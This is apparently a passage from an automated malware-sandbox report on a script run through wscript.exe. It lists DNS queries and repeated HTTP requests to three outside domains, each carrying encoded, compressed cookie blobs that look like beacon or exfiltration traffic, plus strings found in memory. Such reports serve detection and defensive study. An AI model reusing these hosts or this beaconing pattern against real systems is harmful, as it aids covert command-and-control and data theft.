Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0BxKVYvHFC9DwVopRZC3H8R57MytZXFgi/UYOIi0OROMAsTUyjrPiLi+WticdhOfboopbyc/c348e2qR6rXUmC29GkNwVaTLkk36ACH3KvAQAA; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ellinikiaktoploia.netConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: global traffic DNS traffic detected: DNS query: www.shamara.de
Source: global traffic DNS traffic detected: DNS query: ipacrack.com
Source: global traffic DNS traffic detected: DNS query: ellinikiaktoploia.net
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 27 Aug 2024 20:52:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 27 Aug 2024 20:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://0.30000000000000004.com/
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
Source: wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/apache/echarts/issues/14266
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
